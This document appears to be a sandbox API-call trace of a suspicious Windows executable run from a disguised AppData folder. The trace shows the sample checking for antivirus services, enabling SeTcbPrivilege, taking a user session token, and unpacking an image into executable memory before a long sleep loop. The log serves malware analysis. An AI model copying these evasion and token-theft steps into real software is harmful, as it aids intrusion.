	[0092.680] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.681] Sleep (dwMilliseconds=0x1) 
	[0092.696] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228670*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.696] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.696] Sleep (dwMilliseconds=0x1) 
	[0092.713] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228700*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.713] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.713] Sleep (dwMilliseconds=0x1) 
	[0092.727] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228790*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.727] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.727] Sleep (dwMilliseconds=0x1) 
	[0092.756] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228820*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.756] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.756] Sleep (dwMilliseconds=0x1) 
	[0092.758] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2288b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.758] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.758] Sleep (dwMilliseconds=0x1) 
	[0092.774] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228940*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.774] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.774] Sleep (dwMilliseconds=0x1) 
	[0092.790] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2289d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.790] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.790] Sleep (dwMilliseconds=0x1) 
	[0092.808] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228a60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.808] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.808] Sleep (dwMilliseconds=0x1) 
	[0092.821] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228af0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.821] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.821] Sleep (dwMilliseconds=0x1) 
	[0092.836] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228b80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.836] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.836] Sleep (dwMilliseconds=0x1) 
	[0092.852] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228c10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.852] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.852] Sleep (dwMilliseconds=0x1) 
	[0092.874] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228ca0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.874] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.874] Sleep (dwMilliseconds=0x1) 
	[0092.883] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.883] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.883] Sleep (dwMilliseconds=0x1) 
	[0092.899] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.899] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.899] Sleep (dwMilliseconds=0x1) 
	[0092.914] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.915] GetSystemDirectoryW (in: lpBuffer=0x12ae2c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0092.915] GetProcessHeap () returned 0x1d0000
	[0092.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x16) returned 0x212270
	[0092.915] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x211b18
	[0092.916] OpenServiceW (hSCManager=0x211b18, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0
	[0092.917] CloseServiceHandle (hSCObject=0x211b18) returned 1
	[0092.917] GetProcessHeap () returned 0x1d0000
	[0092.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x14) returned 0x2121d0
	[0092.917] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x211b18
	[0092.917] OpenServiceW (hSCManager=0x211b18, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x0
	[0092.918] CloseServiceHandle (hSCObject=0x211b18) returned 1
	[0092.918] GetProcessHeap () returned 0x1d0000
	[0092.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x18) returned 0x2121f0
	[0092.918] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x211b18
	[0092.919] OpenServiceW (hSCManager=0x211b18, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0
	[0092.919] CloseServiceHandle (hSCObject=0x211b18) returned 1
	[0092.919] GetNativeSystemInfo (in: lpSystemInfo=0x12b018 | out: lpSystemInfo=0x12b018*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0092.919] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12aba4, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0092.919] GetProcessHeap () returned 0x1d0000
	[0092.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x18) returned 0x212210
	[0092.919] GetCurrentProcess () returned 0xffffffff
	[0092.919] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12a718 | out: TokenHandle=0x12a718*=0xd8) returned 1
	[0092.919] GetTokenInformation (in: TokenHandle=0xd8, TokenInformationClass=0x1, TokenInformation=0x12a71c, TokenInformationLength=0x4c, ReturnLength=0x12a704 | out: TokenInformation=0x12a71c, ReturnLength=0x12a704) returned 1
	[0092.919] AllocateAndInitializeSid (in: pIdentifierAuthority=0x12a710, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12a70c | out: pSid=0x12a70c*=0x212ec0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0092.920] EqualSid (pSid1=0x12a724*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x212ec0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0092.920] CloseHandle (hObject=0xd8) returned 1
	[0092.920] LoadLibraryA (lpLibFileName="wtsapi32") returned 0x73f10000
	[0092.922] GetProcAddress (hModule=0x73f10000, lpProcName="WTSEnumerateSessionsA") returned 0x73f14023
	[0092.922] GetProcAddress (hModule=0x73f10000, lpProcName="WTSFreeMemory") returned 0x73f11b65
	[0092.922] GetProcAddress (hModule=0x73f10000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x0
	[0092.922] GetProcAddress (hModule=0x73f10000, lpProcName="WTSQueryUserToken") returned 0x73f11f81
	[0092.923] GetCurrentProcess () returned 0xffffffff
	[0092.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x12a75c | out: TokenHandle=0x12a75c*=0xd8) returned 1
	[0092.923] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x12a70c | out: lpLuid=0x12a70c*(LowPart=0x7, HighPart=0)) returned 1
	[0092.924] AdjustTokenPrivileges (in: TokenHandle=0xd8, DisableAllPrivileges=0, NewState=0x12a708*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x12a718, ReturnLength=0x12a764 | out: PreviousState=0x12a718, ReturnLength=0x12a764) returned 1
	[0092.924] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x12a750, pCount=0x12a758 | out: ppSessionInfo=0x12a750, pCount=0x12a758) returned 1
	[0092.932] WTSFreeMemory (pMemory=0x1e6810) 
	[0092.932] RevertToSelf () returned 1
	[0092.932] WTSQueryUserToken (SessionId=0x1, phToken=0x12a704*=0xffffffff) returned 1
	[0092.932] DuplicateTokenEx (in: hExistingToken=0x16c, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x12a754 | out: phNewToken=0x12a754*=0xd0) returned 1
	[0092.933] CloseHandle (hObject=0x16c) returned 1
	[0092.933] AdjustTokenPrivileges (in: TokenHandle=0xd8, DisableAllPrivileges=0, NewState=0x12a718, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0092.933] CloseHandle (hObject=0xd8) returned 1
	[0092.933] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0xd0, dwFlags=0x0, pszPath=0x12a78c | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 0x0
	[0092.943] CloseHandle (hObject=0xd0) returned 1
	[0092.943] lstrcmpiW (lpString1="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpString2="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 0
	[0092.943] VirtualAlloc (lpAddress=0x0, dwSize=0x17e00, flAllocationType=0x3000, flProtect=0x40) returned 0xd50000
	[0092.945] VirtualAlloc (lpAddress=0x400000, dwSize=0x19000, flAllocationType=0x2000, flProtect=0x40) returned 0x0
	[0092.945] VirtualAlloc (lpAddress=0x0, dwSize=0x19000, flAllocationType=0x2000, flProtect=0x40) returned 0xd70000
	[0092.945] GetCurrentProcess () returned 0xffffffff
	[0092.945] VirtualAlloc (lpAddress=0xd70000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0xd70000
	[0092.945] VirtualAlloc (lpAddress=0xd71000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xd71000
	[0092.947] VirtualAlloc (lpAddress=0xd85000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x40) returned 0xd85000
	[0092.947] VirtualAlloc (lpAddress=0xd87000, dwSize=0xa00, flAllocationType=0x1000, flProtect=0x40) returned 0xd87000
	[0092.947] VirtualAlloc (lpAddress=0xd88000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x40) returned 0xd88000
	[0092.957] VirtualProtect (in: lpAddress=0xd71000, dwSize=0x13f00, flNewProtect=0x20, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0092.957] VirtualProtect (in: lpAddress=0xd85000, dwSize=0x1f90, flNewProtect=0x4, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0092.957] VirtualProtect (in: lpAddress=0xd87000, dwSize=0x8a8, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0092.958] VirtualProtect (in: lpAddress=0xd88000, dwSize=0x1d8, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0092.958] GetProcessHeap () returned 0x1d0000
	[0092.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x18) returned 0x212230
	[0092.958] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x212230, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x212230, ReturnLength=0x0) returned 0x0
	[0092.958] VirtualProtect (in: lpAddress=0xd70000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x4) returned 1
	[0092.959] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x771d0000) returned 0x0
	[0092.960] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75610000) returned 0x0
	[0092.960] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="bcrypt.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75080000) returned 0x0
	[0092.962] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x76c00000) returned 0x0
	[0092.962] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x719a0000) returned 0x0
	[0092.965] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75a90000) returned 0x0
	[0092.968] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x76a60000) returned 0x0
	[0092.968] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USERENV.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x74b30000) returned 0x0
	[0092.968] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ncrypt.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x750a0000) returned 0x0
	[0092.986] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x774c0000) returned 0x0
	[0092.987] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="IPHLPAPI.DLL", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x73e70000) returned 0x0
	[0092.994] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75bb0000) returned 0x0
	[0092.994] GetLastError () returned 0x0
	[0092.994] Sleep (dwMilliseconds=0x1) 
	[0093.008] GetLastError () returned 0x0
	[0093.008] Sleep (dwMilliseconds=0x1) 
	[0093.024] GetLastError () returned 0x0
	[0093.024] Sleep (dwMilliseconds=0x1) 
	[0093.039] GetLastError () returned 0x0
	[0093.039] Sleep (dwMilliseconds=0x1) 
	[0093.055] GetLastError () returned 0x0
	[0093.055] Sleep (dwMilliseconds=0x1) 
	[0093.070] GetLastError () returned 0x0
	[0093.070] Sleep (dwMilliseconds=0x1) 
	[0093.086] GetLastError () returned 0x0
	[0093.086] Sleep (dwMilliseconds=0x1) 
	[0093.102] GetLastError () returned 0x0
	[0093.102] Sleep (dwMilliseconds=0x1) 
	[0093.117] GetLastError () returned 0x0
	[0093.117] Sleep (dwMilliseconds=0x1) 
	[0093.133] GetLastError () returned 0x0
	[0093.133] Sleep (dwMilliseconds=0x1) 
	[0093.148] GetLastError () returned 0x0
	[0093.148] Sleep (dwMilliseconds=0x1) 
	[0093.164] GetLastError () returned 0x0
	[0093.164] Sleep (dwMilliseconds=0x1) 
	[0093.180] GetLastError () returned 0x0
	[0093.180] Sleep (dwMilliseconds=0x1) 
	[0093.195] GetLastError () returned 0x0
	[0093.195] Sleep (dwMilliseconds=0x1) 
	[0093.211] GetLastError () returned 0x0
	[0093.211] Sleep (dwMilliseconds=0x1) 
	[0093.226] GetLastError () returned 0x0
	[0093.226] Sleep (dwMilliseconds=0x1) 
	[0093.243] GetLastError () returned 0x0
	[0093.243] Sleep (dwMilliseconds=0x1) 
	[0093.260] GetLastError () returned 0x0
	[0093.260] Sleep (dwMilliseconds=0x1) 
	[0093.273] GetLastError () returned 0x0
	[0093.273] Sleep (dwMilliseconds=0x1) 
	[0093.289] GetLastError () returned 0x0
	[0093.289] Sleep (dwMilliseconds=0x1) 
	[0093.304] GetLastError () returned 0x0
	[0093.304] Sleep (dwMilliseconds=0x1) 
	[0093.320] GetLastError () returned 0x0
	[0093.320] Sleep (dwMilliseconds=0x1) 
	[0093.336] GetLastError () returned 0x0
	[0093.336] Sleep (dwMilliseconds=0x1) 
	[0093.352] GetLastError () returned 0x0
	[0093.352] Sleep (dwMilliseconds=0x1) 
	[0093.367] GetLastError () returned 0x0
	[0093.367] Sleep (dwMilliseconds=0x1) 
	[0093.382] GetLastError () returned 0x0
	[0093.382] Sleep (dwMilliseconds=0x1) 
	[0093.398] GetLastError () returned 0x0
	[0093.398] Sleep (dwMilliseconds=0x1) 
	[0093.414] GetLastError () returned 0x0
	[0093.414] Sleep (dwMilliseconds=0x1) 
	[0093.429] GetLastError () returned 0x0
	[0093.429] Sleep (dwMilliseconds=0x1) 
	[0093.447] GetLastError () returned 0x0
	[0093.447] Sleep (dwMilliseconds=0x1) 
	[0093.461] GetLastError () returned 0x0
	[0093.461] Sleep (dwMilliseconds=0x1) 
	[0093.476] GetLastError () returned 0x0
	[0093.476] Sleep (dwMilliseconds=0x1) 
	[0093.492] GetLastError () returned 0x0
	[0093.492] Sleep (dwMilliseconds=0x1) 
	[0093.507] GetLastError () returned 0x0
	[0093.507] Sleep (dwMilliseconds=0x1) 
	[0093.523] GetLastError () returned 0x0
	[0093.523] Sleep (dwMilliseconds=0x1) 
	[0093.539] GetLastError () returned 0x0
	[0093.539] Sleep (dwMilliseconds=0x1) 
	[0093.554] GetLastError () returned 0x0
	[0093.554] Sleep (dwMilliseconds=0x1) 
	[0093.585] GetLastError () returned 0x0
	[0093.585] Sleep (dwMilliseconds=0x1) 
	[0093.588] GetLastError () returned 0x0
	[0093.588] Sleep (dwMilliseconds=0x1) 
	[0093.601] GetLastError () returned 0x0
	[0093.601] Sleep (dwMilliseconds=0x1) 
	[0093.616] GetLastError () returned 0x0
	[0093.616] Sleep (dwMilliseconds=0x1) 
	[0093.632] GetLastError () returned 0x0
	[0093.632] Sleep (dwMilliseconds=0x1) 
	[0093.647] GetLastError () returned 0x0
	[0093.648] Sleep (dwMilliseconds=0x1) 
	[0093.663] GetLastError () returned 0x0
	[0093.663] Sleep (dwMilliseconds=0x1) 
	[0093.679] GetLastError () returned 0x0
	[0093.679] Sleep (dwMilliseconds=0x1) 
	[0093.694] GetLastError () returned 0x0
	[0093.694] Sleep (dwMilliseconds=0x1) 
	[0093.710] GetLastError () returned 0x0
	[0093.710] Sleep (dwMilliseconds=0x1) 
	[0093.726] GetLastError () returned 0x0
	[0093.726] Sleep (dwMilliseconds=0x1) 
	[0093.741] GetLastError () returned 0x0
	[0093.741] Sleep (dwMilliseconds=0x1) 
	[0093.769] GetLastError () returned 0x0
	[0093.769] Sleep (dwMilliseconds=0x1) 
	[0093.772] GetLastError () returned 0x0
	[0093.772] Sleep (dwMilliseconds=0x1) 
	[0093.788] GetLastError () returned 0x0
	[0093.788] Sleep (dwMilliseconds=0x1) 
	[0093.804] GetLastError () returned 0x0
	[0093.804] Sleep (dwMilliseconds=0x1) 
	[0093.819] GetLastError () returned 0x0
	[0093.819] Sleep (dwMilliseconds=0x1) 
	[0093.835] GetLastError () returned 0x0
	[0093.835] Sleep (dwMilliseconds=0x1) 
	[0093.852] GetLastError () returned 0x0
	[0093.852] Sleep (dwMilliseconds=0x1) 
	[0093.866] GetLastError () returned 0x0
	[0093.866] Sleep (dwMilliseconds=0x1) 
	[0093.881] GetLastError () returned 0x0
	[0093.881] Sleep (dwMilliseconds=0x1) 
	[0093.897] GetLastError () returned 0x0
	[0093.897] Sleep (dwMilliseconds=0x1) 
	[0093.916] GetLastError () returned 0x0
	[0093.916] Sleep (dwMilliseconds=0x1) 
	[0093.928] GetLastError () returned 0x0
	[0093.928] Sleep (dwMilliseconds=0x1) 
	[0093.944] GetLastError () returned 0x0
	[0093.944] Sleep (dwMilliseconds=0x1) 
	[0093.959] GetLastError () returned 0x0
	[0093.959] Sleep (dwMilliseconds=0x1) 
	[0093.980] GetLastError () returned 0x0
	[0093.980] Sleep (dwMilliseconds=0x1) 
	[0093.990] GetLastError () returned 0x0
	[0093.991] Sleep (dwMilliseconds=0x1) 
	[0094.007] GetLastError () returned 0x0
	[0094.007] Sleep (dwMilliseconds=0x1) 
	[0094.022] GetLastError () returned 0x0
	[0094.022] Sleep (dwMilliseconds=0x1) 
	[0094.037] GetLastError () returned 0x0
	[0094.038] Sleep (dwMilliseconds=0x1) 
	[0094.053] GetLastError () returned 0x0
	[0094.053] Sleep (dwMilliseconds=0x1) 
	[0094.069] GetLastError () returned 0x0
	[0094.069] Sleep (dwMilliseconds=0x1) 
	[0094.084] GetLastError () returned 0x0
	[0094.084] Sleep (dwMilliseconds=0x1) 
	[0094.100] GetLastError () returned 0x0
	[0094.100] Sleep (dwMilliseconds=0x1) 
	[0094.116] GetLastError () returned 0x0
	[0094.116] Sleep (dwMilliseconds=0x1) 
	[0094.131] GetLastError () returned 0x0
	[0094.131] Sleep (dwMilliseconds=0x1) 
	[0094.147] GetLastError () returned 0x0
	[0094.147] Sleep (dwMilliseconds=0x1) 
	[0094.163] GetLastError () returned 0x0
	[0094.163] Sleep (dwMilliseconds=0x1) 
	[0094.178] GetLastError () returned 0x0
	[0094.178] Sleep (dwMilliseconds=0x1) 
	[0094.193] GetLastError () returned 0x0
	[0094.194] Sleep (dwMilliseconds=0x1) 
	[0094.209] GetLastError () returned 0x0
	[0094.209] Sleep (dwMilliseconds=0x1) 
	[0094.225] GetLastError () returned 0x0
	[0094.225] Sleep (dwMilliseconds=0x1) 
	[0094.240] GetLastError () returned 0x0
	[0094.240] Sleep (dwMilliseconds=0x1) 
	[0094.256] GetLastError () returned 0x0
	[0094.256] Sleep (dwMilliseconds=0x1) 
	[0094.271] GetLastError () returned 0x0
	[0094.271] Sleep (dwMilliseconds=0x1) 
	[0094.287] GetLastError () returned 0x0
	[0094.287] Sleep (dwMilliseconds=0x1) 
	[0094.309] GetLastError () returned 0x0
	[0094.309] Sleep (dwMilliseconds=0x1) 
	[0094.318] GetLastError () returned 0x0
	[0094.318] Sleep (dwMilliseconds=0x1) 
	[0094.334] GetLastError () returned 0x0
	[0094.334] Sleep (dwMilliseconds=0x1) 
	[0094.350] GetLastError () returned 0x0
	[0094.350] Sleep (dwMilliseconds=0x1) 
	[0094.365] GetLastError () returned 0x0
	[0094.365] Sleep (dwMilliseconds=0x1) 
	[0094.381] GetLastError () returned 0x0
	[0094.381] Sleep (dwMilliseconds=0x1) 
	[0094.396] GetLastError () returned 0x0
	[0094.396] Sleep (dwMilliseconds=0x1) 
	[0094.412] GetLastError () returned 0x0
	[0094.412] Sleep (dwMilliseconds=0x1) 
	[0094.428] GetLastError () returned 0x0
	[0094.428] Sleep (dwMilliseconds=0x1) 
	[0094.443] GetLastError () returned 0x0
	[0094.443] Sleep (dwMilliseconds=0x1) 
	[0094.459] GetLastError () returned 0x0
	[0094.459] Sleep (dwMilliseconds=0x1) 
	[0094.505] GetLastError () returned 0x0
	[0094.505] Sleep (dwMilliseconds=0x1) 
	[0094.521] GetLastError () returned 0x0
	[0094.521] Sleep (dwMilliseconds=0x1) 
	[0094.537] GetLastError () returned 0x0
	[0094.537] Sleep (dwMilliseconds=0x1) 
	[0094.553] GetLastError () returned 0x0
	[0094.553] Sleep (dwMilliseconds=0x1) 
	[0094.586] GetLastError () returned 0x0
	[0094.586] Sleep (dwMilliseconds=0x1) 
	[0094.599] GetLastError () returned 0x0
	[0094.599] Sleep (dwMilliseconds=0x1) 
	[0094.615] GetLastError () returned 0x0
	[0094.615] Sleep (dwMilliseconds=0x1) 
	[0094.630] GetLastError () returned 0x0
	[0094.630] Sleep (dwMilliseconds=0x1) 
	[0094.646] GetLastError () returned 0x0
	[0094.646] Sleep (dwMilliseconds=0x1) 
	[0094.662] GetLastError () returned 0x0
	[0094.662] Sleep (dwMilliseconds=0x1) 
	[0094.677] GetLastError () returned 0x0
	[0094.677] Sleep (dwMilliseconds=0x1) 
	[0094.693] GetLastError () returned 0x0
	[0094.693] Sleep (dwMilliseconds=0x1) 
	[0094.708] GetLastError () returned 0x0
	[0094.708] Sleep (dwMilliseconds=0x1) 
	[0094.724] GetLastError () returned 0x0
	[0094.724] Sleep (dwMilliseconds=0x1) 
	[0094.739] GetLastError () returned 0x0
	[0094.740] Sleep (dwMilliseconds=0x1) 
	[0094.755] GetLastError () returned 0x0
	[0094.755] Sleep (dwMilliseconds=0x1) 
	[0094.782] GetLastError () returned 0x0
	[0094.782] Sleep (dwMilliseconds=0x1) 
	[0094.786] GetLastError () returned 0x0
	[0094.786] Sleep (dwMilliseconds=0x1) 
	[0094.802] GetLastError () returned 0x0
	[0094.802] Sleep (dwMilliseconds=0x1) 
